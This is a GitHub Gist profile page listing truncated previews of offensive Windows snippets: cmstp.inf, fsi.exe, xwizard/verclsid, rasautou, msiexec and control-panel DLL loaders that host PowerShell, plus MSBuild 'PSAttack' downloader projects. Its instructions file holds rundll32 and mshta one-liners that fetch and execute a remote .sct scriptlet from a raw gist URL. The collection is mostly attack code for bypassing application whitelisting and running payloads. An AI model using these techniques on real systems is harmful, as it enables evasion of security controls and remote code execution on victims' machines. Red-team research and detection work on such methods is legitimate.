Skip to content

Instantly share code, notes, and snippets.

NickTyrer

Block or report user

Report or block NickTyrer

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
View cmstp.inf
;cmstp.exe /s cmstp.inf
[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection
[UnRegisterOCXSection]
@NickTyrer
NickTyrer / fsharp.fsscript
Created Sep 3, 2017
fsi.exe inline execution
View fsharp.fsscript
#r @"C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll"
open System.Management.Automation
open System.Management.Automation.Runspaces
open System
let runSpace = RunspaceFactory.CreateRunspace()
runSpace.Open()
let pipeline = runSpace.CreatePipeline()
View instructions.txt
xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC}
verclsid.exe /S /C {00000001-0000-0000-0000-0000FEEDACDC}
create new folder and rename file.{00000001-0000-0000-0000-0000FEEDACDC}
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";o=GetObject("script:https://gist.githubusercontent.com/NickTyrer/0598b60112eaafe6d07789f7964290d5/raw/7717cfad109fc15a6796dd9119b0267f7a4df3fd/power.sct");close();
mshta javascript:o=GetObject("script:https://gist.githubusercontent.com/NickTyrer/0598b60112eaafe6d07789f7964290d5/raw/7717cfad109fc15a6796dd9119b0267f7a4df3fd/power.sct");o.Exec();close();
View powersct.sct
<?xml version="1.0" encoding="utf-8"?>
<package>
<component
id="dummy">
<registration
description="dummy"
progid="dummy"
version="1.00"
remotable="True">
<script
View rasautou.cs
using System;
using System.Runtime.InteropServices;
using RGiesecke.DllExport;
using System.Management.Automation;
using System.Collections.ObjectModel;
using System.Text;
// compile using unmanaged exports and referencing system.management.automation
// rasautou -d powershell.dll -p powershell -a a -e e
@NickTyrer
NickTyrer / PSA64.cs
Created Nov 19, 2016
PSAttack Using MSBuild Downloader
View PSA64.cs
This file has been truncated, but you can view the full file.
//Credits to Casey Smith for his initial research here "https://gist.github.com/subTee/ca477b4d19c885bec05ce238cbad6371"
//Based on Jared Haight work (https://github.com/jaredhaight/PSAttack)
//1. Compile "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:PSA64.exe PSA64.cs"
using System;
using System.Reflection;
namespace PSA64
{
class Program
@NickTyrer
NickTyrer / PSA_MSBUILD64.csproj
Created Nov 18, 2016
PSAttack Using MSBuild Bytestream
View PSA_MSBUILD64.csproj
This file has been truncated, but you can view the full file.
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- Based on Casey Smith work (https://gist.github.com/subTee/ca477b4d19c885bec05ce238cbad6371), -->
<!-- Based on Jared Haight work (https://github.com/jaredhaight/PSAttack), -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe PSA_MSBUILD64.csproj -->
<Target Name="PSAttack">
<PSA_MSBUILD64 />
</Target>
<UsingTask
TaskName="PSA_MSBUILD64"
View msiexec.cs
// msiexec /z "full path to msiexec.dll"
using System;
using System.Runtime.InteropServices;
using RGiesecke.DllExport;
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using System.Text;
View cpl.cs
using System;
using System.Runtime.InteropServices;
using RGiesecke.DllExport;
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using System.Text;
public class Test
{
You can’t perform that action at this time.